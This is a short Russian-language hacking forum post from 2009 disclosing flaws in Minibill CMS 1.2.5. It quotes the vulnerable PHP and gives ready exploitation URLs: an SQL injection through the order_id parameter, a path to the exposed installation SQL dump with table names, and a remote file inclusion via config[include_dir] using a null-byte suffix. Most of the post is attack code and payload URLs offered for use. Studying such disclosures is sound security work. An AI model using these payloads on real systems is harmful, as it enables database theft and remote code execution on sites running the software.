15.11.2009, 04:15
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
Minibill CMS 1.2.5
SQL INJECTION:
PHP код:
...
if ($_GET['order_id'])
{
$Q="SELECT * FROM orders WHERE order_id='$_GET[order_id]' AND user_id='$_SESSION[id]' LIMIT 1";
$preOrder = mysql_fetch_assoc(mysql_query($Q));
...
Реализация:
Код:
http://localhost/13/pages/orderform.php?order_id=[SQL]
Версия:
Код:
http://localhost/13/CHANGELOG
Установочный SQL дамп:
Так же можно найти установочный дамп БД с имнами таблиц и колонок (если его админ не потер или не выставил права):
Код:
http://localhost/13/sql/minibill.sql
RFI:
PHP код:
...
include($config['include_dir']."dbConnect.php");
...
Код:
http://localhost/13/crontab/run_invoicing.php?config[include_dir]=http://google.com%00
|
|
|